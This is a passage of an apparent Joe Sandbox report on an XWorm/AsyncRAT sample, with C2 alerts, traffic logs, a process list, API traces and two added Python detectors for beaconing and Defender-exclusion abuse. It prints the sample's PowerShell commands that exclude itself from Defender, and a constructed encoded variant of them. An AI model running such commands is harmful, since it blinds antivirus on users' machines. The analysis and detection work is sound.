2024-11-23T20:56:53.717446+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49738 | 45.141.26.170 | 7000 | TCP
2024-11-23T20:57:00.915702+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.26.170 | 7000 | 192.168.2.4 | 49738 | TCP
2024-11-23T20:57:00.938069+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49738 | 45.141.26.170 | 7000 | TCP
2024-11-23T20:57:06.709253+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.26.170 | 7000 | 192.168.2.4 | 49738 | TCP
2024-11-23T20:57:06.709253+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 45.141.26.170 | 7000 | 192.168.2.4 | 49738 | TCP
2024-11-23T20:57:08.789804+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 45.141.26.170 | 7000 | 192.168.2.4 | 49738 | TCP
2024-11-23T20:57:08.790805+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49738 | 45.141.26.170 | 7000 | TCP
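Cadence of the client check-ins in the alert table above, as an added example that is not part of the Joe Sandbox report: the ALERTS rows are copied from the table (timestamp, SID, source, destination), while the analysis functions and the two thresholds (at least five intervals, coefficient of variation at most 0.3) are this example's own assumptions. It measures how regular the outbound SID 2852923 alerts are, which is the basis of a simple beacon detector.

```python
"""Cadence of the XWorm check-ins in the Suricata alert table above.

Added example, not part of the Joe Sandbox report. ALERTS is copied from the
report's alert table; the analysis and the thresholds are this example's own.
"""
from collections import Counter
from datetime import datetime
from statistics import mean, median, pstdev

C2 = ("45.141.26.170", 7000)
VICTIM = ("192.168.2.4", 49738)

# (timestamp, SID, source, destination) as the report lists them.
# 2852923 fires on the client's check-in, 2852870/2852874 on the server's
# replies, 2855924 on the client's outbound PING.
ALERTS = [
    ("2024-11-23T20:56:06.689976+0100", 2852870, C2, VICTIM),
    ("2024-11-23T20:56:06.689976+0100", 2852874, C2, VICTIM),
    ("2024-11-23T20:56:07.443101+0100", 2855924, VICTIM, C2),
    ("2024-11-23T20:56:08.027932+0100", 2852870, C2, VICTIM),
    ("2024-11-23T20:56:08.091499+0100", 2852923, VICTIM, C2),
    ("2024-11-23T20:56:19.446957+0100", 2852870, C2, VICTIM),
    ("2024-11-23T20:56:19.448824+0100", 2852923, VICTIM, C2),
    ("2024-11-23T20:56:30.886735+0100", 2852870, C2, VICTIM),
    ("2024-11-23T20:56:30.891652+0100", 2852923, VICTIM, C2),
    ("2024-11-23T20:56:36.678510+0100", 2852870, C2, VICTIM),
    ("2024-11-23T20:56:36.678510+0100", 2852874, C2, VICTIM),
    ("2024-11-23T20:56:42.292240+0100", 2852870, C2, VICTIM),
    ("2024-11-23T20:56:42.296449+0100", 2852923, VICTIM, C2),
    ("2024-11-23T20:56:53.715117+0100", 2852870, C2, VICTIM),
    ("2024-11-23T20:56:53.717446+0100", 2852923, VICTIM, C2),
    ("2024-11-23T20:57:00.915702+0100", 2852870, C2, VICTIM),
    ("2024-11-23T20:57:00.938069+0100", 2852923, VICTIM, C2),
    ("2024-11-23T20:57:06.709253+0100", 2852870, C2, VICTIM),
    ("2024-11-23T20:57:06.709253+0100", 2852874, C2, VICTIM),
    ("2024-11-23T20:57:08.789804+0100", 2852870, C2, VICTIM),
    ("2024-11-23T20:57:08.790805+0100", 2852923, VICTIM, C2),
]


def parse_ts(s):
    """Report timestamps carry a +0100 offset; %z keeps them timezone-aware."""
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S.%f%z")


def alerts_by_sid(alerts):
    """How often each signature fired."""
    return Counter(sid for _, sid, _, _ in alerts)


def intervals_for(alerts, sid, source):
    """Seconds between consecutive alerts of one SID sent by one endpoint."""
    times = sorted(parse_ts(ts) for ts, s, src, _ in alerts if s == sid and src == source)
    return [(later - earlier).total_seconds() for earlier, later in zip(times, times[1:])]


def cadence(intervals):
    """Median period and coefficient of variation; a low CV means a fixed timer."""
    if len(intervals) < 2:
        return None
    return {"n": len(intervals), "median": median(intervals),
            "cv": pstdev(intervals) / mean(intervals)}


def is_beaconing(intervals, min_samples=5, max_cv=0.3):
    """Assumed thresholds: enough samples and jitter below 30 % of the mean."""
    c = cadence(intervals)
    return c is not None and c["n"] >= min_samples and c["cv"] <= max_cv


def summarize(alerts=ALERTS):
    """Everything an analyst would want from the table in one dict."""
    iv = intervals_for(alerts, 2852923, VICTIM)
    return {"by_sid": dict(alerts_by_sid(alerts)), "checkin_intervals": iv,
            "cadence": cadence(iv), "beaconing": is_beaconing(iv)}


if __name__ == "__main__":
    for key, value in summarize().items():
        print(f"{key}: {value}")
```

The seven client check-ins are 11.4 s apart for the first five and about 7.5 s apart afterwards; the median stays at 11.4 s and the coefficient of variation at roughly 0.18, so the timer-driven cadence is visible even with the change of pace.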
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 23, 2024 20:55:01.789154053 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
Nov 23, 2024 20:55:01.916055918 CET | 80 | 49730 | 208.95.112.1 | 192.168.2.4
Nov 23, 2024 20:55:01.916155100 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
Nov 23, 2024 20:55:01.917303085 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
Nov 23, 2024 20:55:02.039004087 CET | 80 | 49730 | 208.95.112.1 | 192.168.2.4
Nov 23, 2024 20:55:03.061079979 CET | 80 | 49730 | 208.95.112.1 | 192.168.2.4
Nov 23, 2024 20:55:03.111433983 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
Nov 23, 2024 20:55:55.854644060 CET | 49738 | 7000 | 192.168.2.4 | 45.141.26.170
Nov 23, 2024 20:55:55.977458954 CET | 7000 | 49738 | 45.141.26.170 | 192.168.2.4
Nov 23, 2024 20:55:55.977574110 CET | 49738 | 7000 | 192.168.2.4 | 45.141.26.170
Nov 23, 2024 20:55:56.032727957 CET | 49738 | 7000 | 192.168.2.4 | 45.141.26.170
Nov 23, 2024 20:55:56.157277107 CET | 7000 | 49738 | 45.141.26.170 | 192.168.2.4
Nov 23, 2024 20:55:58.346637964 CET | 80 | 49730 | 208.95.112.1 | 192.168.2.4
Nov 23, 2024 20:55:58.346708059 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
Nov 23, 2024 20:56:06.689975977 CET | 7000 | 49738 | 45.141.26.170 | 192.168.2.4
Nov 23, 2024 20:56:06.736720085 CET | 49738 | 7000 | 192.168.2.4 | 45.141.26.170
Nov 23, 2024 20:56:07.443100929 CET | 49738 | 7000 | 192.168.2.4 | 45.141.26.170
Nov 23, 2024 20:56:07.563496113 CET | 7000 | 49738 | 45.141.26.170 | 192.168.2.4
Nov 23, 2024 20:56:08.027931929 CET | 7000 | 49738 | 45.141.26.170 | 192.168.2.4
Nov 23, 2024 20:56:08.087874889 CET | 49738 | 7000 | 192.168.2.4 | 45.141.26.170
Nov 23, 2024 20:56:08.091499090 CET | 49738 | 7000 | 192.168.2.4 | 45.141.26.170
Nov 23, 2024 20:56:08.211173058 CET | 7000 | 49738 | 45.141.26.170 | 192.168.2.4
Nov 23, 2024 20:56:18.862524986 CET | 49738 | 7000 | 192.168.2.4 | 45.141.26.170
Nov 23, 2024 20:56:18.982467890 CET | 7000 | 49738 | 45.141.26.170 | 192.168.2.4
Nov 23, 2024 20:56:19.446957111 CET | 7000 | 49738 | 45.141.26.170 | 192.168.2.4
Nov 23, 2024 20:56:19.448823929 CET | 49738 | 7000 | 192.168.2.4 | 45.141.26.170
Nov 23, 2024 20:56:19.570760965 CET | 7000 | 49738 | 45.141.26.170 | 192.168.2.4
Nov 23, 2024 20:56:30.285281897 CET | 49738 | 7000 | 192.168.2.4 | 45.141.26.170
Nov 23, 2024 20:56:30.404866934 CET | 7000 | 49738 | 45.141.26.170 | 192.168.2.4
Nov 23, 2024 20:56:30.886734962 CET | 7000 | 49738 | 45.141.26.170 | 192.168.2.4
Nov 23, 2024 20:56:30.891652107 CET | 49738 | 7000 | 192.168.2.4 | 45.141.26.170
Nov 23, 2024 20:56:31.013333082 CET | 7000 | 49738 | 45.141.26.170 | 192.168.2.4
Nov 23, 2024 20:56:36.678509951 CET | 7000 | 49738 | 45.141.26.170 | 192.168.2.4
Nov 23, 2024 20:56:36.721043110 CET | 49738 | 7000 | 192.168.2.4 | 45.141.26.170
Nov 23, 2024 20:56:41.705862999 CET | 49738 | 7000 | 192.168.2.4 | 45.141.26.170
Nov 23, 2024 20:56:41.826405048 CET | 7000 | 49738 | 45.141.26.170 | 192.168.2.4
Nov 23, 2024 20:56:42.292239904 CET | 7000 | 49738 | 45.141.26.170 | 192.168.2.4
Nov 23, 2024 20:56:42.296448946 CET | 49738 | 7000 | 192.168.2.4 | 45.141.26.170
Nov 23, 2024 20:56:42.422864914 CET | 7000 | 49738 | 45.141.26.170 | 192.168.2.4
Nov 23, 2024 20:56:43.081775904 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
Nov 23, 2024 20:56:43.235579014 CET | 80 | 49730 | 208.95.112.1 | 192.168.2.4
Nov 23, 2024 20:56:53.127747059 CET | 49738 | 7000 | 192.168.2.4 | 45.141.26.170
Nov 23, 2024 20:56:53.247493982 CET | 7000 | 49738 | 45.141.26.170 | 192.168.2.4
Nov 23, 2024 20:56:53.715116978 CET | 7000 | 49738 | 45.141.26.170 | 192.168.2.4
Nov 23, 2024 20:56:53.717446089 CET | 49738 | 7000 | 192.168.2.4 | 45.141.26.170
Nov 23, 2024 20:56:53.837203979 CET | 7000 | 49738 | 45.141.26.170 | 192.168.2.4
Nov 23, 2024 20:57:00.330722094 CET | 49738 | 7000 | 192.168.2.4 | 45.141.26.170
Nov 23, 2024 20:57:00.451127052 CET | 7000 | 49738 | 45.141.26.170 | 192.168.2.4
Nov 23, 2024 20:57:00.915702105 CET | 7000 | 49738 | 45.141.26.170 | 192.168.2.4
Nov 23, 2024 20:57:00.938069105 CET | 49738 | 7000 | 192.168.2.4 | 45.141.26.170
Nov 23, 2024 20:57:01.058618069 CET | 7000 | 49738 | 45.141.26.170 | 192.168.2.4
Nov 23, 2024 20:57:06.709253073 CET | 7000 | 49738 | 45.141.26.170 | 192.168.2.4
Nov 23, 2024 20:57:06.752327919 CET | 49738 | 7000 | 192.168.2.4 | 45.141.26.170
Nov 23, 2024 20:57:08.205930948 CET | 49738 | 7000 | 192.168.2.4 | 45.141.26.170
Nov 23, 2024 20:57:08.325592041 CET | 7000 | 49738 | 45.141.26.170 | 192.168.2.4
Nov 23, 2024 20:57:08.789803982 CET | 7000 | 49738 | 45.141.26.170 | 192.168.2.4
Nov 23, 2024 20:57:08.790805101 CET | 49738 | 7000 | 192.168.2.4 | 45.141.26.170
Nov 23, 2024 20:57:08.912101984 CET | 7000 | 49738 | 45.141.26.170 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 23, 2024 20:55:01.631128073 CET | 53390 | 53 | 192.168.2.4 | 1.1.1.1
Nov 23, 2024 20:55:01.781498909 CET | 53 | 53390 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 23, 2024 20:55:01.631128073 CET | 192.168.2.4 | 1.1.1.1 | 0xb4ec | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 23, 2024 20:55:01.781498909 CET | 1.1.1.1 | 192.168.2.4 | 0xb4ec | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                                                                • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 208.95.112.1 | 80 | 7396 | C:\Users\user\Desktop\18fvs4AVae.exe
Timestamp | Bytes transferred | Direction | Data
Nov 23, 2024 20:55:01.917303085 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
Nov 23, 2024 20:55:03.061079979 CET | 175 | IN | HTTP/1.1 200 OK
    Date: Sat, 23 Nov 2024 19:55:02 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 6
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
    Data Raw: 66 61 6c 73 65 0a
    Data Ascii: false

                                                                Target ID:0
                                                                Start time:14:54:57
                                                                Start date:23/11/2024
                                                                Path:C:\Users\user\Desktop\18fvs4AVae.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Users\user\Desktop\18fvs4AVae.exe"
                                                                Imagebase:0x480000
                                                                File size:51'200 bytes
                                                                MD5 hash:59A9510540FEC35043B990DEB270B139
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000000.1683273081.0000000000482000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1683273081.0000000000482000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1683273081.0000000000482000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2946825942.0000000002771000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:false

                                                                Target ID:1
                                                                Start time:14:55:02
                                                                Start date:23/11/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe'
                                                                Imagebase:0x7ff788560000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:14:55:02
                                                                Start date:23/11/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:4
                                                                Start time:14:55:09
                                                                Start date:23/11/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '18fvs4AVae.exe'
                                                                Imagebase:0x7ff788560000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:5
                                                                Start time:14:55:09
                                                                Start date:23/11/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:9
                                                                Start time:14:55:19
                                                                Start date:23/11/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\VLC_Media.exe'
                                                                Imagebase:0x7ff788560000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:10
                                                                Start time:14:55:19
                                                                Start date:23/11/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:11
                                                                Start time:14:55:33
                                                                Start date:23/11/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VLC_Media.exe'
                                                                Imagebase:0x7ff788560000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:12
                                                                Start time:14:55:33
                                                                Start date:23/11/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true
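Detection logic for the four Add-MpPreference command lines in the process list above, as an added example that is not part of the Joe Sandbox report. The first four CommandLine values are copied from the process list; the benign event, the -EncodedCommand variant, the Sysmon-style field names and every ParentImage value are constructed for this example (the report does not print the parent of each process, so attributing them to the sample is an assumption), and the scoring thresholds are likewise assumptions. It goes one step beyond the report's plain-text case by decoding the -EncodedCommand form that the Sigma rule in the summary refers to.

```python
"""Flag Defender exclusions added from PowerShell, as seen in the process list.

Added example, not part of the Joe Sandbox report. EVENTS[0:4] carry the
report's own command lines; the other events, the field names and every
ParentImage value are constructed for this example.
"""
import base64
import re

# Locations a low-privileged user (or a dropped sample) can write to; an
# exclusion covering one of these is far more suspicious than a build share.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")

POWERSHELL = '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"'
SAMPLE = "C:\\Users\\user\\Desktop\\18fvs4AVae.exe"  # assumed parent of each PowerShell

# -e, -ec, -enc, -EncodedCommand: the unambiguous prefixes PowerShell accepts.
ENCODED_RE = re.compile(r"-e(?:c|nc\w*)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# An exclusion parameter and its (possibly quoted, comma-separated) values.
PARAM_RE = re.compile(
    r"(-Exclusion(?:Path|Process|Extension|IpAddress))\s+(.+?)(?=\s+-[A-Za-z]|\s*$)",
    re.IGNORECASE,
)


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def exclusion_targets(script):
    """(parameter, value) for every exclusion the script adds."""
    pairs = []
    for m in PARAM_RE.finditer(script):
        for value in m.group(2).split(","):
            pairs.append((m.group(1), value.strip().strip("'\"")))
    return pairs


def assess(event):
    """Score one process-creation event; None when it adds no Defender exclusion."""
    cmd = event["CommandLine"]
    decoded = decode_encoded_command(cmd)
    script = decoded if decoded is not None else cmd
    if not re.search(r"\bAdd-MpPreference\b", script, re.IGNORECASE):
        return None
    targets = exclusion_targets(script)
    if not targets:
        return None
    reasons = ["Add-MpPreference with " + ", ".join(sorted({p for p, _ in targets}))]
    if decoded is not None:
        reasons.append("cmdlet hidden in -EncodedCommand")
    if re.search(r"-ExecutionPolicy\s+Bypass", cmd, re.IGNORECASE):
        reasons.append("-ExecutionPolicy Bypass")
    if any(v.lower().startswith(USER_WRITABLE) for _, v in targets):
        reasons.append("exclusion covers a user-writable location")
    parent = event.get("ParentImage", "")
    if parent.lower().startswith(USER_WRITABLE):
        reasons.append("spawned from user-writable parent " + parent)
    # Assumed threshold: three independent indicators make it high severity.
    return {"severity": "high" if len(reasons) >= 3 else "medium",
            "targets": targets, "reasons": reasons}


def _b64_utf16(script):
    """Encode a script the way PowerShell expects it for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


EVENTS = [
    # The four exclusions the report shows, attributed to the sample by assumption.
    {"ParentImage": SAMPLE, "CommandLine": POWERSHELL + " -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\\Users\\user\\Desktop\\18fvs4AVae.exe'"},
    {"ParentImage": SAMPLE, "CommandLine": POWERSHELL + " -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '18fvs4AVae.exe'"},
    {"ParentImage": SAMPLE, "CommandLine": POWERSHELL + " -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\\ProgramData\\VLC_Media.exe'"},
    {"ParentImage": SAMPLE, "CommandLine": POWERSHELL + " -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VLC_Media.exe'"},
    # Constructed: an administrator excluding a build directory via a management agent.
    {"ParentImage": "C:\\Program Files\\Mgmt\\agent.exe", "CommandLine": POWERSHELL + " -NoProfile Add-MpPreference -ExclusionPath 'D:\\Builds'"},
    # Constructed: the same exclusion as EVENTS[2], wrapped in -EncodedCommand.
    {"ParentImage": SAMPLE, "CommandLine": POWERSHELL + " -nop -w hidden -enc " + _b64_utf16("Add-MpPreference -ExclusionPath 'C:\\ProgramData\\VLC_Media.exe'")},
    # Constructed: only reads preferences, must not fire.
    {"ParentImage": SAMPLE, "CommandLine": POWERSHELL + " Get-MpPreference"},
]


def scan(events=EVENTS):
    """(index, verdict) for every event that adds an exclusion."""
    hits = []
    for i, event in enumerate(events):
        verdict = assess(event)
        if verdict:
            hits.append((i, verdict))
    return hits


if __name__ == "__main__":
    for i, verdict in scan():
        print(i, verdict["severity"], verdict["targets"], verdict["reasons"])
```

The report's four command lines each collect three or four indicators (the cmdlet, -ExecutionPolicy Bypass, a user-writable parent and, for the two -ExclusionPath calls, a user-writable target), the constructed administrative exclusion scores only the cmdlet itself, and the encoded variant is caught because the script is decoded before matching rather than grepping the raw command line.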


                                                                  Execution Graph

                                                                  Execution Coverage:20.2%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:15%
                                                                  Total number of Nodes:20
                                                                  Total number of Limit Nodes:1
execution_graph (rendered graph omitted; API-call nodes recovered from the graph data):
  0x7ffd9b8983c6  SetWindowsHookExW
  0x7ffd9b8983c9  SetWindowsHookExW
  0x7ffd9b898a92  RtlSetProcessIsCritical
  0x7ffd9b896e7f  CheckRemoteDebuggerPresent
  0x7ffd9b898e67  SetWindowsHookExW

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
control_flow_graph (rendered graph omitted): function at 0x7ffd9b899420, basic blocks from 0x7ffd9b899420 to 0x7ffd9b89e446, each marked Executed or Not Executed in the rendered graph; the raw edge list is not reproduced here.
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2985296589.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_18fvs4AVae.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID: 0-3916222277
                                                                  • Opcode ID: 87068ca955b933b1960782510d424fb1bb1573d26e4e31367c3e9e5353f6dea3
                                                                  • Instruction ID: b5d756bdb760430f51d56913e479bd1d5a2425a2c6b69e6001d7bed972d286ee
                                                                  • Opcode Fuzzy Hash: 87068ca955b933b1960782510d424fb1bb1573d26e4e31367c3e9e5353f6dea3
                                                                  • Instruction Fuzzy Hash: E472A130B1D90E4FEFA8E7788466AB976E2EF9C304B510579D41EC32D6DE38AC428745

                                                                  Control-flow Graph

                                                                  [Control-flow graph rendering omitted; function at 7ffd9b890610]
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2985296589.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_18fvs4AVae.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CAN_^
                                                                  • API String ID: 0-3098826533
                                                                  • Opcode ID: 1f5c3204728a7085af0497fb587f5fd162d9ecccd90aaa359e4778270691b8d5
                                                                  • Instruction ID: ed1dd52b3f317632086f7f7c765a0cd0b9e4f016c4218ed35693148f18217ccf
                                                                  • Opcode Fuzzy Hash: 1f5c3204728a7085af0497fb587f5fd162d9ecccd90aaa359e4778270691b8d5
                                                                  • Instruction Fuzzy Hash: F3321A21B2DA494FEB98FB7898696B97BD1FF9C304F40057DE44EC32D6DD28A9018341

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2985296589.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_18fvs4AVae.jbxd
                                                                  Similarity
                                                                  • API ID: CheckDebuggerPresentRemote
                                                                  • String ID:
                                                                  • API String ID: 3662101638-0
                                                                  • Opcode ID: 9b2d0eeb564d9d31ad838737307bdbf0b45fcd96cffad13fbf8a4607500c2426
                                                                  • Instruction ID: 993561481d268376b671e3803bb0e5f93bc170e0f5044a5fb549e7cc8989a667
                                                                  • Opcode Fuzzy Hash: 9b2d0eeb564d9d31ad838737307bdbf0b45fcd96cffad13fbf8a4607500c2426
                                                                  • Instruction Fuzzy Hash: 9051213090D78C8FCB55DB6888556E97FF0FF5A320F0902ABD499C7192DA38A946CB81

                                                                  Control-flow Graph

                                                                  [Control-flow graph rendering omitted; function at 7ffd9b8958b6]
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2985296589.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_18fvs4AVae.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 14924c2f1912e27642513646cbf9d3c3e0b8d427a23af0ec761c959f70b2d2df
                                                                  • Instruction ID: 810a7e5229007d20f7e47c68654406da0efe4b34e58e010f28dafa70c03f9eff
                                                                  • Opcode Fuzzy Hash: 14924c2f1912e27642513646cbf9d3c3e0b8d427a23af0ec761c959f70b2d2df
                                                                  • Instruction Fuzzy Hash: 57F1B630A09B8D8FEFA8DF28D8657E97BD1FF58310F04426AE85DC7295CB3499418B81
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2985296589.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_18fvs4AVae.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0a394030e576c89a08693277df8052784318f1d59a5bef476c0ff8400ad80172
                                                                  • Instruction ID: 2e9baf30a913b14c21c51fc631232043a719ca2cecdabebd2a8abf304cdb77fd
                                                                  • Opcode Fuzzy Hash: 0a394030e576c89a08693277df8052784318f1d59a5bef476c0ff8400ad80172
                                                                  • Instruction Fuzzy Hash: A7E1B470A09A4E8FEFA8DF28C8657E97BD1FF58350F04426AD84DC7295CF7499418B81
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2985296589.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_18fvs4AVae.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 78da56b4ea0ea925ccfca5ee7c442a4212c3a06010806f896b8afb37bdf51cc7
                                                                  • Instruction ID: 59083c72b5b1a8d9b119e76321027719377589e2ef9b34382ce415650fda3f3b
